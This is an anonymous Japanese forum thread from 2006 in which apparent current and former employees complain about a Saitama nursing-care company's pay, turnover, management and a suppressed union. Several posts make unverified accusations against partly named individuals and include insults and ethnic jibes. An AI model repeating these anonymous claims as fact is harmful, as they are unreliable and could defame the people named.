労組を作る事を薦める。

163 :ななしのフクちゃん:2006/04/20(木) 18:49:29 ID:CfEQGJwV
懲罰委員会って何ですか?


164 :ななしのフクちゃん:2006/04/26(水) 14:12:17 ID:r7TzeH6L
赤字会社なの?

165 :ななしのフクちゃん:2006/04/26(水) 16:00:34 ID:TxgCHld3
たった今までウグイスネットだと思ってました。 ホーホケキョ♪

166 :ななしのフクちゃん:2006/04/27(木) 09:18:24 ID:v3JMIcAT
164>>赤字だから、上場出来ていないのでは?

167 :ななしのフクちゃん:2006/04/27(木) 11:53:32 ID:J1FGuxEU
mousugu///
aborn

168 :ななしのフクちゃん:2006/04/27(木) 14:10:15 ID:xrf1uZwu
        ,..:‐' ̄ ̄ ̄`` 'h..:::  : ::..  ,i'     !、   ノ   .::.i
      /         c'      __)'      )  /    ノ
    /         c' ,.、ノ`‐'イ、       `t':: :  /
.   ,.''          .」.:: ,. /´  \     ,.r'.>  イ―――――――ー―:.、
  /          r'´: ::/      ヽ、,.::‐r'' Y :..:::::ノ              l
  i´          .i , /         i   `i .l :: ./       ,.=―‐、   .h
 i'        .....::,,,,l :: ノ  、      ト.、  i lノ イ     ,..::''´  ̄ ̄`:、  F'┐
 !       ..::::::f r.':::,.イ   `ヽ、   .ノ ヽ r'~´..:: イ  ,...::‐''´ー――‐‐:...、ヽ_)r了)
 i    ,,.:   :::::ヽニ;i.ノ::: 田田田`ヽ、ノ   ,..::‐'〉. r__,,、        `ー''´
  !  ,.:'     """""`   .、田田田.トー‐'´  /:::.)`i::::::::::::::::ヽ、   
  l                `ー:.、田    i::..:::)┴:、_::::::::::::::ヽ、   
  l                   ` く  ,..t、..::).ノ(●)(◎)‐、:::::::::::|
  i                     \( !、_| l :      |::::::::::< おれが削除屋@ほ〜ろ〜人だけど文句あっかい値ゃあ〜!
 i'                       ヽ\___ノ(●)(◎)/l.::::::::::|
 l                        ヽ.______ノ ::::::::::|  
 l                         i:::::::::::::::::::::::::::::::::::::/     
. !                         ヽ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄、        ,..:‐'^r‐r'
  :、                         :``ー┬ ' ̄ ̄``ー―:.、__,...:‐'´ r'´ `⊆、
.  ヽ                         .:: :  l          ``ー――‐'´    `i




169 :ななしのフクちゃん:2006/05/02(火) 00:05:53 ID:iR3HRjJC
さて、新卒は何名確保できますか?


170 :ななしのフクちゃん:2006/05/06(土) 21:29:21 ID:nQAlTwwO
たぶん0名

171 :ななしのフクちゃん:2006/05/12(金) 15:34:39 ID:CeonsWGB
今日の埼玉新聞9面にでかでかと記事でてます。社長は現場上っ面しかみてないよ。嘘つきやなぁという感想です。

172 :ななしのフクちゃん:2006/05/12(金) 19:25:01 ID:4jkBs9o0
>>171
埼玉新聞とウイズネットは兄弟です。
新卒が集まらなくて大変ですね。


173 :ななしのフクちゃん:2006/05/13(土) 14:57:43 ID:Z4WabTE6
新卒もバカじゃないですし選ぶでしょう。明るい未来ない会社だから。

174 :ななしのフクちゃん:2006/05/14(日) 00:02:15 ID:Df1UDpIa
新卒でここなら親が泣く。


175 :ななしのフクちゃん:2006/05/14(日) 00:20:18 ID:S85PpEY6
オープン間もない頃
私が休み中利用者が転倒した
どういった経緯で事故が起こったのか知りたくても、
ファイル等を事務所やホーム長フロア長が隠す。
スタッフ間の連絡ノートもその日のページだけ破られていた。
事務とホーム長に詰め寄ったが、逆ギレ。
辞めてから市に告発したけれど、、、。
3年前のことです


176 :ななしのフクちゃん:2006/05/14(日) 23:58:11 ID:Df1UDpIa
告発しても刑事罰が無いから。
やっぱり泣き寝入りかな。
とにかく、新卒や転職考えている人は絶対ここだけは入っちゃだめだよ。


177 :ななしのフクちゃん:2006/05/15(月) 16:22:48 ID:X6VPjhg0
いろいろあるんですね・・・・
ちゃんとしてると思ったのに・・・

178 :ななしのフクちゃん:2006/05/17(水) 20:35:14 ID:t0STbQ50
同属だからね

179 :ななしのフクちゃん:2006/05/19(金) 01:41:01 ID:cQDCkV0k
175さん そりゃぁおかしいですよ!! なんで逆ギレなんだぁ!! その長とやらおかしいよ!

180 :ななしのフクちゃん:2006/05/19(金) 07:05:47 ID:dwlKPng0
離職率が高いのは何か問題があるのだよ。

181 :ななしのフクちゃん:2006/05/19(金) 09:27:49 ID:q6n2KnRA
何か問題があるにしても、全部読んできてると異常だよ・・・
人の命あずかってんだからしっかりしろよな・・・

182 :ななしのフクちゃん:2006/05/19(金) 12:31:29 ID:dwlKPng0
現場はしっかりしている。
おかしいのは本社連中の指示だよ。

183 :ななしのフクちゃん:2006/05/20(土) 12:01:04 ID:w1gCqcsb
現場もおかしい

184 :ななしのフクちゃん:2006/05/20(土) 14:26:45 ID:alK2/R7L
現場もおかしくて上層部もおかしくてって言ったらもう救いようないな。

185 :ななしのフクちゃん:2006/05/20(土) 18:35:48 ID:w1gCqcsb
救いようないのは分かってる

186 :ななしのフクちゃん:2006/05/22(月) 18:07:36 ID:ePuBD0NQ
人が足りなくて大変だね。
役所に立ち入られないようにね。

187 :ななしのフクちゃん:2006/05/23(火) 01:58:53 ID:V9lgawYG
人を見る目ない会社。SVの好き嫌いで現場評価。SVの思い込み、思い付きで動く。だからいい人材の離職とまらない。

188 :ななしのフクちゃん:2006/05/23(火) 17:36:12 ID:oB3BQMDO
SVは操り人形です。

189 :ななしのフクちゃん:2006/05/24(水) 15:46:24 ID:eZOdJa5z
福祉におけるSVの意味を学ばんとあかんわ。現場いたスタッフをSV候補にしても、うえが聞く耳もたないから、意味ないし。発展も成長もできひんわな。なんも知らん操り人形SVがどんだけ会社ダメにしてるやろか。よう考えや、アホ社長!

190 :ななしのフクちゃん:2006/05/24(水) 16:06:53 ID:eZOdJa5z
埼玉県も監査の仕方、いいのかな?ウィズネットの事を間違って過大評価してないかな?

191 :ななしのフクちゃん:2006/05/24(水) 18:31:40 ID:UzUBzypU
埼玉県は静観中。労働局は監視中、過大評価しているのはさいたま市と蓮田市。

192 :ななしのフクちゃん:2006/05/25(木) 01:56:22 ID:jcQcHPoL
埼玉県も労働監督基準署もまっとうである事を信じたい。

193 :ななしのフクちゃん:2006/05/26(金) 07:36:38 ID:o9DtZNhL
では、どうすれば納得しますか。

194 :ななしのフクちゃん:2006/05/26(金) 08:15:24 ID:vyiL+zjC
高〇商店であり続ける限り、変革はできないから、納得というか、働きやすい、働きたいという環境にはならんでしょう。新しいまっとうな風は吹かせないから…

195 :ななしのフクちゃん:2006/05/27(土) 07:29:02 ID:FHniuj2U
つまり関わるなという事だね。
しかしSVは無神経な奴多いね。
よくあんなの雇うよ。

196 :ななしのフクちゃん:2006/05/29(月) 05:41:51 ID:+gnrrfKv
変える方法の一つとして、ワタミに買収してもらう。

197 :ななしのフクちゃん:2006/05/29(月) 22:30:10 ID:0IWnTGBT
投資価値ないやん。代表お気に入りのくそ●ほか、身内を社会勉強させな変わらんやん。役員が?????な人間性やし。

198 :ななしのフクちゃん:2006/05/30(火) 07:10:05 ID:MI6pnNDL
身内の好き嫌いがすべてだから。
職員は早く転職するのがいいよ。

199 :ななしのフクちゃん:2006/05/30(火) 15:21:54 ID:BJHlMOZY
↑↑↑↑↑↑↑↑↑↑↑↑↑↑
その通り

200 :ななしのフクちゃん:2006/05/30(火) 22:52:29 ID:7OqzuykP
さよなら〜ウィズネット。さよなら〜友よ。スキルアップして転職しなはれ〜福祉で飯を食っていくならね〜さいならさいならさいなら〜

201 :ななしのフクちゃん:2006/05/31(水) 00:13:55 ID:30spOwZl
転職かぁ… みんなはどこの会社がいいと思う?

202 :ななしのフクちゃん:2006/05/31(水) 01:39:06 ID:J/5MZXUX
自分できめなさい

203 :ななしのフクちゃん:2006/05/31(水) 07:00:10 ID:V76kLIdx
ウイズ以外ならどこも優良企業だよ。

204 :ななしのフクちゃん:2006/06/01(木) 09:50:15 ID:iEucitaL
これ社長はみてんのかな?

205 :ななしのフクちゃん:2006/06/01(木) 12:20:21 ID:JkPz/VJS
社長、みてますか?
人が足りません。役所の抜き打ち監査が恐いです。

206 :ななしのフクちゃん:2006/06/01(木) 23:55:51 ID:5fsRgYgq
行政関係者、みてますか?抜き打ち監査して、社長の暴走止めて下さい〜人事の●沢さん見てますか〜、一回ウィズネット辞めてまともな人は戻りませんよ〜恥ずかしいファックス流さないでね〜

207 :ななしのフクちゃん:2006/06/02(金) 09:47:24 ID:wO2xcV5W
一度でいいから見てみたい

ウィズネットの実態を


ウタマルです

208 :ななしのフクちゃん:2006/06/03(土) 08:43:01 ID:7VD5QAWj
ただの零細DQNだよ。バカばっかり。

209 :ななしのフクちゃん:2006/06/03(土) 09:42:57 ID:6Eny4Emx
社長!がんばれっ!!って無理かな(笑




210 :ななしのフクちゃん:2006/06/03(土) 10:04:15 ID:SDoESRTK
辞めたいけど、退職金もらえるかな?

211 :ななしのフクちゃん:2006/06/03(土) 20:23:10 ID:8GbyKnec
退職金なんかないよ。人材育成という言葉は知らない人材使い捨て会社だから。社長も役員もSVも介護に関して何が大切か、知らないから。仮に退職金なんかあってもすずめの涙だよ。

212 :ななしのフクちゃん:2006/06/04(日) 09:38:27 ID:haHjj0gT
うわぁぁぁ!!!なんて最悪な企業だぁ・・・


213 :ななしのフクちゃん:2006/06/04(日) 12:39:01 ID:haHjj0gT
行政関係に通報しても意味ないのかなぁ・・


214 :ななしのフクちゃん:2006/06/04(日) 15:16:34 ID:+Gr+GbrA
辞めるのがいいよ。

215 :ななしのフクちゃん:2006/06/05(月) 19:35:19 ID:q9rDcALr
外部の講座や講演会に行くと、ウィズネットの危うさ、医療系のずさんさを痛感しますよ〜

216 :ななしのフクちゃん:2006/06/06(火) 06:59:01 ID:7iHUIkj4
病む前に辞めよう。

217 :ななしのフクちゃん:2006/06/07(水) 07:10:46 ID:yCBL0vwK
現場は待遇よくないかな?

218 :ななしのフクちゃん:2006/06/08(木) 07:07:56 ID:sCojVDJX
再就職は何するの?

219 :ななしのフクちゃん:2006/06/15(木) 07:34:05 ID:RK98QLFb
福祉

220 :ななしのフクちゃん:2006/06/20(火) 10:13:52 ID:+CAoYvii
ね〜なんかないの〜


221 :ななしのフクちゃん:2006/06/20(火) 12:27:43 ID:FH55RfUj
中国人、元気か?

222 :ななしのフクちゃん:2006/06/20(火) 15:00:35 ID:+CAoYvii
中国人??

223 :ななしのフクちゃん:2006/06/20(火) 22:19:17 ID:Tvqa9wPO
みんなで社長に何を、どこを目指してるのか聞いてみよう。っつうか、社長、現場を正しくみやがれ、あほんだら!

224 :ななしのフクちゃん:2006/06/20(火) 22:29:06 ID:Tvqa9wPO
222↑ 業務日誌担当の宋さん?

225 :ななしのフクちゃん:2006/06/20(火) 22:36:32 ID:qKJZLsEk


226 :ななしのフクちゃん:2006/06/21(水) 07:06:29 ID:ToaLCeQo
ところでみなさんはこの会社をどこで知りました?
私はハローワークです。

227 :ななしのフクちゃん:2006/06/23(金) 14:08:21 ID:VMtlREiz
全てはビジネス。どんどんオープンさせます。職員のスキルなんて期待してません。
数さえ集まれば臨機応変に異動させ低コストで使い捨てします。信頼なんて二の次。儲けることが先決です。

228 :ななしのフクちゃん:2006/06/24(土) 00:26:45 ID:xrscp/B9
給料やすいし、ハローワークの情報と違うし。独身男性、結婚しても共働きじゃないと養えません。

229 :ななしのフクちゃん:2006/06/24(土) 08:26:53 ID:lAPaq2k0
これ以上犠牲者を出さない為にハローワークに申し伝えましょう。

230 :ななしのフクちゃん:2006/06/24(土) 09:08:05 ID:lAPaq2k0
リーダーは金銭の亡者であってはならない。

231 :ななしのフクちゃん:2006/06/24(土) 20:25:30 ID:flH+xNRK
早く生き過ぎた・・・
スピードを落とす訳にはいかない・・・前進拡大路線

そして・・・・刺されて撃沈

敗戦処理

事業の再構築 リストラ縮小 事業切り売り


そうならない様に利用者の為にも、たのんます。

232 :ななしのフクちゃん:2006/06/25(日) 09:18:42 ID:HQXwi2ZW
本社が癌

233 :ななしのフクちゃん:2006/06/28(水) 19:05:11 ID:acwWp9PD
人手不足で大変やのにセクハラで更につらい思いしてる若いスタッフいますよ〜泣いてるよ、辞めちゃうよ

234 :ななしのフクちゃん:2006/06/29(木) 07:22:49 ID:91VFRhr5
どこのホーム?

235 :ななしのフクちゃん:2006/06/29(木) 08:51:05 ID:er+vE377
↑もう本社知ってるらしい。どう対処するか見物だね〜

236 :ななしのフクちゃん:2006/06/30(金) 07:19:05 ID:x1q0Cb2z
どんなセクハラなの?

237 :ななしのフクちゃん:2006/06/30(金) 22:30:18 ID:ab8F2RXa
10ヵ月に渡り、ちまちまと色々です。セクハラした方は謹慎中で自宅待機らしいですよ〜

238 :ななしのフクちゃん:2006/07/01(土) 21:11:49 ID:sSzgQSik
SVは何をしていたのだ?

239 :ななしのフクちゃん:2006/07/02(日) 03:28:21 ID:hR647AXa
ウィズネットにはSVいないよね。もしバイザー名乗るやついたら、恥知らずだから反面教師にしよう〜  社長も恥知らずだし、本当に恥ずかしい会社だね…

240 :ななしのフクちゃん:2006/07/02(日) 09:28:06 ID:gOiPM+1y
なら理想的なSVとは?

241 :ななしのフクちゃん:2006/07/02(日) 21:03:21 ID:hR647AXa
↑あんたも勉強しなさい。理想的なSVを考える前に、SVってどんな事をする人かを知りなさい。ちなみにここのSVと呼ばれる人たちはスーパーバイズもできなければ、会社の経営手腕もないよね。まぁ自分が努力しないで、上の悪口しか言えないやつの方が救いようがないと思うね。

242 :ななしのフクちゃん:2006/07/03(月) 09:01:11 ID:EEr80mXI
救いようの無い会社だからハローワークにしか求人を出せないのか。


243 :ななしのフクちゃん:2006/07/03(月) 11:38:58 ID:V/MkSfmT
本社、東京に移すのか?

244 :ななしのフクちゃん:2006/07/03(月) 12:24:39 ID:r9pQ1hui
SVとはスーパーバカの略です。
都内のどこに本社移すの?

245 :ななしのフクちゃん:2006/07/04(火) 01:36:23 ID:uHJmtJst
実は職安の求人で余りいいトコないよね。福祉以外は分からないけど。再就職先を職安で探すのは薦められないかな。

246 :ななしのフクちゃん:2006/07/04(火) 12:00:43 ID:4GkD2c/A
>>245
ネットで医療・福祉の専門JOBがあったと思うけど・・・

247 :ななしのフクちゃん:2006/07/05(水) 10:27:18 ID:Zqp0o4Uk
ここは監督署から是正勧告を受けているから求人出せないのだ。

248 :ななしのフクちゃん:2006/07/05(水) 10:36:51 ID:8BRTJ+6h
.

249 :ななしのフクちゃん:2006/07/06(木) 18:32:23 ID:buCgEWOt
二度とこういう会社に入らないように気をつけないといけない。

250 :ななしのフクちゃん:2006/07/07(金) 22:55:11 ID:+AJ0BB6l
岩盤浴は儲かってますか?

251 :ななしのフクちゃん:2006/07/08(土) 17:32:40 ID:CdXzKh2A
障害児施設も作るらしい、手を広げすぎでない?辞めるなら今の内〓〓

252 :ななしのフクちゃん:2006/07/08(土) 21:35:55 ID:9IYceVov
ちゃんと出来るリーダーいないのに無責任に手を広げすぎ。犯罪だよ。離職率高すぎで、絶対に上場できひんから辞める事をすすめる。転職先はいくらでもあるよ。

253 :ななしのフクちゃん:2006/07/09(日) 16:09:25 ID:GV4R5KPn
前進拡大のみに生きる道もある・・・福祉界のダイエーを目指します!

254 :ななしのフクちゃん:2006/07/10(月) 13:20:42 ID:fRX7lVoy
結果、経営破綻、企業再生機構の出番ですか?税金使わないでね…

255 :ななしのフクちゃん:2006/07/10(月) 15:56:03 ID:+ieltQZ8
思いつきで始めたからね。
適当に採用するし。

256 :ななしのフクちゃん:2006/07/12(水) 15:02:15 ID:JRWxVSzB
また切れられた

257 :ななしのフクちゃん:2006/07/12(水) 20:48:05 ID:n4sWAPtv
↑詳しく教えて。

258 :ななしのフクちゃん:2006/07/13(木) 00:33:41 ID:L7QdIgSG
やだよ。犯人探しされて見せしめ移動になるじゃん。

259 :ななしのフクちゃん:2006/07/13(木) 07:48:13 ID:G02b3maK
適当社会人育成に最高の会社です。高橋一家や石丸にぺこぺこしてれば一生ダメ人間になれます。

260 :ななしのフクちゃん:2006/07/14(金) 02:01:53 ID:O/mpGcCi
入って3日で辞めればよかった2年棒に振ったよ。


261 :ななしのフクちゃん:2006/07/14(金) 12:28:14 ID:VnsPvDxu
少ないボーナスがでて、辞める人多いのかな?

ボロクソに言われ、可愛そうになってきた。

262 :ななしのフクちゃん:2006/07/14(金) 12:40:06 ID:ZjrZ3lyO
ボーナスのたびに辞める人多いよ。うえは、もらえるだけありがたいと思えって考えてるから。去年、三橋の幹部クラスのやつに聞いたよ。

263 :ななしのフクちゃん:2006/07/14(金) 13:14:03 ID:CvfpXirF
みんな早く転職するのがいいよ。

264 :ななしのフクちゃん:2006/07/15(土) 14:00:56 ID:AWrPEtoW
ウィズネットに長くいると不幸になるよ。本人は気付かなくなるのが恐い。表情や気持ちが落ちてきてらしく生きてないけど、そこに気付けなくなる。恐い。辞める選択肢もみえなくなってる。悲しいね。恐い現象。

265 :ななしのフクちゃん:2006/07/16(日) 14:01:06 ID:s5kR22EE
現場なら同業他社に行けるじゃん。


266 :ななしのフクちゃん:2006/07/17(月) 15:47:23 ID:ZItRNhmv
ウィズネットのいいトコないの?

267 :ななしのフクちゃん:2006/07/18(火) 07:05:20 ID:8p9hruaQ
全く無いね。同族はどこもそうだが特にここはひどい。
入ってすぐに辞めれば良かったと激しく後悔してるよ。

268 :ななしのフクちゃん:2006/07/18(火) 09:21:21 ID:F+wVRzZA
そんなことないよ、定時には帰れるし、煙草も好きな時に吸える、仕事しなくていい仕事場

269 :ななしのフクちゃん:2006/07/19(水) 06:54:08 ID:TLygeNen
ホームによる。本社は激務

270 :ななしのフクちゃん:2006/07/21(金) 12:23:46 ID:jzNbNNul
早く辞めれば良かった。長くいすぎた。

271 :ななしのフクちゃん:2006/07/21(金) 18:57:56 ID:dbSi+X29
確か、労働組合を作ったみたいだけど何か変った?どうなってるのか誰か知ってませんか?賃金値上交渉してるの?

272 :ななしのフクちゃん:2006/07/22(土) 09:15:35 ID:bGkLYC7A
何それ?詳しく教えて?

273 :ななしのフクちゃん:2006/07/23(日) 04:34:58 ID:1nY3w121
くたばれ、ウィズネット。聞こえてこない家族の叫びを知らない社長、役員、バイザーたち。あなた達は自慰で金を巻き上げてますよ。

274 :ななしのフクちゃん:2006/07/23(日) 16:29:56 ID:Hs5MiOWy
早く辞めるのがいいよ。長くいて良いこと無いから。本当に。

275 :ななしのフクちゃん:2006/07/23(日) 18:44:52 ID:NppF6dDu
与野のホームの人達が?立ち上げたと聞いたが…ウソだったらすいまそん、詳しくは知らないんだ!

276 :ななしのフクちゃん:2006/07/23(日) 22:04:24 ID:KypXSNMn
組合は速攻で潰しましたが何か?

277 :ななしのフクちゃん:2006/07/24(月) 06:36:13 ID:jDNjvPVf
どうして潰したの?

278 :ななしのフクちゃん:2006/07/24(月) 18:27:23 ID:BlIeHgeT
誰がつぶしたんだょぉぉ(;´д`)

279 :ななしのフクちゃん:2006/07/25(火) 00:05:41 ID:FHUTmco6
ワンマン経営の邪魔だからです

280 :ななしのフクちゃん:2006/07/25(火) 07:06:54 ID:8bRs0+Xp
誰も組合に協力しなかったの?チャンスだったのに。

281 :ななしのフクちゃん:2006/07/28(金) 06:42:35 ID:qFkGyhub
〉279 犯人はキミか……高○ファミリーのだれだろな………

282 :ななしのフクちゃん:2006/07/28(金) 07:31:03 ID:/pLW4abI
簡単に組合潰されるんじゃあ経営者の勝ちだよ。
辞めるのがいいよ。

283 :ななしのフクちゃん:2006/07/29(土) 23:21:34 ID:WwwiR8lL
最後は『辞職』に辿着く職場…少しも未練が無いとはネ。

本社って、人間関係どうなの?女好きはまだいるの?

284 :ななしのフクちゃん:2006/07/30(日) 00:48:19 ID:pxrl5Q61
民主党支持のウィズネット。不祥事もあるし、会社はのびず、利用者にも逃げられるし、支持政党と一緒だね。ぷぷぷっ。おいらは無党派ねん。

285 :ななしのフクちゃん:2006/07/30(日) 18:12:56 ID:oF2AZMRa
本社に独身やバツイチ女性が多いのは誰かさんの好みさ。
北朝鮮企業だね。

286 :ななしのフクちゃん:2006/07/30(日) 20:35:08 ID:tdQpD5pj
おまいら、ちゃんと新聞読んでるかい?
特に介護士の人・・・2ちゃんで文句ばっか言って何も行動を取ってない間に規制緩和で近い日に
外国人介護士が大量に来て職場を追われるか、低賃金でよく働く外国人の下働きになるぞ!

287 :ななしのフクちゃん:2006/07/31(月) 01:48:07 ID:MSP9m3zd
>>286
ホームが淘汰されるのが先でしょ。
大手が参入してきてるのに、潰れるのは時間の問題じゃん。
手に職の無い本社連中こそ、どうすんの?

288 :ななしのフクちゃん:2006/07/31(月) 07:27:24 ID:vUjomBwI
本社連中のヒラはいつでもクビを切れますから。

289 :ななしのフクちゃん:2006/07/31(月) 09:48:53 ID:ZznsytEL
>>287
潰れる訳ないじゃんw
身売りしてリストラなだけだよ
早いとこ、労組作るこったな

290 :ななしのフクちゃん:2006/08/01(火) 10:21:57 ID:WJmgb8rT
仕事の内容は好きだから、入居者を考えるとちょっと、とか思ってる皆さん、井のなかの蛙になって、身を滅ぼしますよ。離職者より

291 :ななしのフクちゃん:2006/08/01(火) 11:25:11 ID:GCL/ZXvP
早く辞めないと潰しがきかなくなるよ。

292 :ななしのフクちゃん:2006/08/03(木) 11:15:56 ID:nUC5Hqd0
何時、上場ですか?・・・無理か 同じ高橋でも、メディカルケア○ービスは上場決まりましたよ。
個人商店は、上場は無理でしょ! 業者から騙し取った出資金貨してあげなよ。

293 :ななしのフクちゃん:2006/08/04(金) 00:02:09 ID:cuXtTJNy
何か最近、ハロワに求人バシバシ出してるな。

294 :ななしのフクちゃん:2006/08/04(金) 08:16:54 ID:OvdTPcQc
離職率高いからね。

295 :ななしのフクちゃん:2006/08/04(金) 21:06:31 ID:0AL7JoLF
辞めれない人の言葉って、自分へのいいわけか、自信ないかのどっちかだよなぁ。新卒も他は全部けられた様なやつばっかでした。俺が入った頃は。

296 :ななしのフクちゃん:2006/08/05(土) 00:04:15 ID:XgcLfa4N
>>295は現在はプー太郎か?

297 :ななしのフクちゃん:2006/08/05(土) 09:39:31 ID:ugr1xc5a
ウィズでの経験は、他で通用しないのはナゼ?と考える今日この頃。
特養で働いてた、と聞くと皆すごいと言うのもおかしいよね。

人材センターに行くと、福祉の求人が沢山ありますよ。

298 :ななしのフクちゃん:2006/08/05(土) 13:47:33 ID:8zX4KXDi
>>295
新卒でウイズって親が泣くよ。

>>297
同業他社からハブられてるからじゃね?


299 :ななしのフクちゃん:2006/08/05(土) 23:32:55 ID:XgcLfa4N
ここの会社の代表が書いた本を読んだけど、何て馬鹿奴なんだろうと思った。
あんなの出版しちゃイカンよ、読んでる自分が恥ずかしくなる位の低脳さ下限だよ

ウィズネットの挑戦”だったけか?w私の評価としましては3コマ漫画以下です。


300 :ななしのフクちゃん:2006/08/05(土) 23:40:39 ID:JGZ41cUl
295は、スキルアップしてよそで働いてます。幹部の発想、発言は社長の本を筆頭に変だから、はぶられるというより相手にされなくなりますよ。

301 :ななしのフクちゃん:2006/08/06(日) 01:48:57 ID:vGniYEvI
>>299
あれはひどいよね、コムスン社長が投げ捨てたらしいよ。
国語の勉強したほうがいいよ。

>>300
すでに相手にされていないからね。転職おめでとう。
ここで働いたら他では精神的には楽だよ。脱北朝鮮みたいなもの。

302 :ななしのフクちゃん:2006/08/06(日) 15:48:16 ID:UPL+D7xS
すべてが最低

303 :ななしのフクちゃん:2006/08/07(月) 12:02:15 ID:yp2McnRa
SVで嫌味とか一言多い人いるよね。
入居者が泣いていたよ。SVはホームに来ても入居者と関わるな!

304 :ななしのフクちゃん:2006/08/08(火) 20:19:02 ID:OMX0yY7E
ここの社長は街場の不動産屋の親父みたいな経営者だと聞いたけど
笑顔はやっぱりキショイのかい?

305 :ななしのフクちゃん:2006/08/08(火) 21:10:03 ID:DThvrmSx
イヤミとねずみ男を足して2で割った感じかな。

306 :ななしのフクちゃん:2006/08/09(水) 12:19:29 ID:jj5/0Vpm
>>305
そういう系統の顔って、ほとんどの人は性格はセコクて肝っ玉が小さく
考えが浅はかで行動力だけは人一倍の猪タイプが多いんだよね〜
あと+アルファで自我自賛で他人からの評判を結構気にするけど、
自分にとって不愉快な話しの時は、勝手に怒って不機嫌になる単純で簡単な性格が多い。

顔で言うと自民党の山本太一似に、多いタイプ

307 :ななしのフクちゃん:2006/08/09(水) 15:08:28 ID:SoSx8Ady
よくご存じで、本社勤務ですか?
一日も早く辞めましょう。

308 :ななしのフクちゃん:2006/08/10(木) 00:00:08 ID:hPydkVGD
さっさとやめれ、はよ辞めろ。
こういうとこでグチグチいうやつなんか、いらね。

309 :ななしのフクちゃん:2006/08/10(木) 09:49:15 ID:nhNvA9T6
絶対辞めない!他に行くところがない。
>>308
雇われのおまいに言われる覚えは無し!経営者でないお前は勘違いするな


310 :ななしのフクちゃん:2006/08/11(金) 00:45:03 ID:0DWWDRDb
他にいくとこないならしゃーない。
北朝鮮企業で、高○将軍様に仕えるがいい。
ただ、この将軍は簡単にクビを切るけどね。


311 :ななしのフクちゃん:2006/08/11(金) 03:18:55 ID:yww60aAM
他に行くトコあるよ。年配者でも雇ってくれるトコあるし。ウィズネット好きなら別だけど、私は早く辞める事を薦めます。会社としても、介護についての知識なども三流ですから。他からきたり、離れたりすると分かりますよ。

312 :ななしのフクちゃん:2006/08/11(金) 03:26:54 ID:AJ2tG4+k
ここはほんとよくないよ

313 :ななしのフクちゃん:2006/08/11(金) 07:45:10 ID:0SVC7JdE
他社は待遇はともかく、保証はあるから、早く転職するのがいいよ。
歳はすぐに取る。
ウイズネットに自分の将来をあげる程、みなさんの人生は安いのか?

314 :ななしのフクちゃん:2006/08/11(金) 14:16:30 ID:yww60aAM
いい人材を介護職から離してしまう会社。あ〜勿体ない。あほな社長だなぁ。

315 :ななしのフクちゃん:2006/08/11(金) 20:28:47 ID:id5KQyOg
いよいよ元介護士やら現役やら、報道局orジャーナリストへの内部告発大会が、
始まったみたいだな。ここは告発者いてるのかな

316 :ななしのフクちゃん:2006/08/11(金) 21:51:05 ID:0DWWDRDb
今まで告発されなかったのが、おかしい。

317 :ななしのフクちゃん:2006/08/14(月) 07:03:35 ID:89dAOvF5
とにかく早く辞めるのがいい

318 :ななしのフクちゃん:2006/08/14(月) 11:00:36 ID:t6sKzGso
無理して辞めんでも・・・

319 :ななしのフクちゃん:2006/08/15(火) 07:43:23 ID:wPoqbNyU
早いうちに辞めるのがいいよ。
若いうちならなんとかなる。

320 :ななしのフクちゃん:2006/08/16(水) 10:21:25 ID:p7iYoy6b
遅刻しまくり、無断欠勤、ズル休みしまくりの糞職員が我がGHにいます。とっととクビにしてほしいか、本部ケアマネの彼女なんで、なかなかクビに出来ないらしい。欝出汁脳…。

321 :ななしのフクちゃん:2006/08/16(水) 17:16:54 ID:usKFQflA
誰ですか?

322 :ななしのフクちゃん:2006/08/16(水) 17:40:40 ID:aj5ffEae
本部の人達は、そんなに偉いのですか?

323 :ななしのフクちゃん:2006/08/16(水) 22:12:12 ID:gC5XdajK
>>321
川崎久地のK田とかいう馬鹿女。


324 :ななしのフクちゃん:2006/08/17(木) 07:47:57 ID:XnV6xi0E
本部は休みなしで一日12時間労働だよ。

325 :ななしのフクちゃん:2006/08/19(土) 02:13:13 ID:mPglYJbe
最低な会社と分かってるなら辞めろよ。辞めれずウィズネットにぶらさがってるなら文句いうな。ここにいると人間性も腐るな。本人達は気付かないが。

326 :ななしのフクちゃん:2006/08/19(土) 09:57:15 ID:uEVtih6r
介護職=ワーキングプアだよ

327 :ななしのフクちゃん:2006/08/19(土) 11:02:40 ID:+uXIZpv3
ウィズネットを辞め、今、とても楽しく働いてます!!
退職金があるところです。やっぱり、長く働くには退職金ぐらいないとね・・・
ウィズネット待遇が悪すぎ!
もっと他社を広くみてください!
転職は多いにいいと思いますよ
ウィズネットでは実力がつきませんから!

328 :ななしのフクちゃん:2006/08/19(土) 11:58:57 ID:uEVtih6r
>>324さん
本当なんですか?

329 :ななしのフクちゃん:2006/08/19(土) 12:18:24 ID:YXw34vQd
本社に休みという概念は無い。

330 :ななしのフクちゃん:2006/08/22(火) 00:48:39 ID:E7NCkx7l
メンズエステw

331 :ななしのフクちゃん:2006/08/22(火) 08:16:03 ID:1kDGT+RS
それは言ってはいけない

332 :ななしのフクちゃん:2006/08/22(火) 17:12:39 ID:WDuOBG08
GHの本を見てワロタww

333 :ななしのフクちゃん:2006/08/25(金) 11:28:12 ID:PpHXffyD
作文へただね

334 :ななしのフクちゃん:2006/08/26(土) 12:16:38 ID:XUC8c3ff
スーパーブラック

335 :ななしのフクちゃん:2006/08/26(土) 16:25:30 ID:tcqQEcvN
なんとも言えないまったり感。
夏も終わりますね。

336 :ななしのフクちゃん:2006/08/26(土) 23:06:49 ID:0B8G5J6N
くたばれウィズネット。

337 :ななしのフクちゃん:2006/08/26(土) 23:38:08 ID:77yjjLM/
>>320
出勤前日に「法事だから」と突然欠勤して、次に出勤してきたら全身真っ黒に日焼けしてきた馬鹿女?

338 :ななしのフクちゃん:2006/08/27(日) 14:45:11 ID:9N+0jAqG
ブラック企業

339 :ななしのフクちゃん:2006/09/01(金) 15:49:02 ID:dS8ohX9h
メンズエステはじめたの?

340 :ななしのフクちゃん:2006/09/04(月) 12:37:25 ID:dPi5M4OU
嫌なら辞めろ!

341 :ななしのフクちゃん:2006/09/05(火) 10:52:33 ID:NTFQrMKI
なんか雑誌みたいのだしてない? 無料なんだけど、中身読んだらつまらなかった。
みんな読んだことある?

342 :ななしのフクちゃん:2006/09/08(金) 03:33:07 ID:bhPodX1F
なかみねーなフリーペーパー

343 :ななしのフクちゃん:2006/09/09(土) 11:48:47 ID:u5tw7pDM
今朝はヤバかったよー
夜勤でイチャxAしてたらそのまま眠っちゃって早番の人に見つかりかけたw
彼氏と夜勤サイコー☆

344 :ななしのフクちゃん:2006/09/11(月) 07:34:07 ID:GuSTFym/
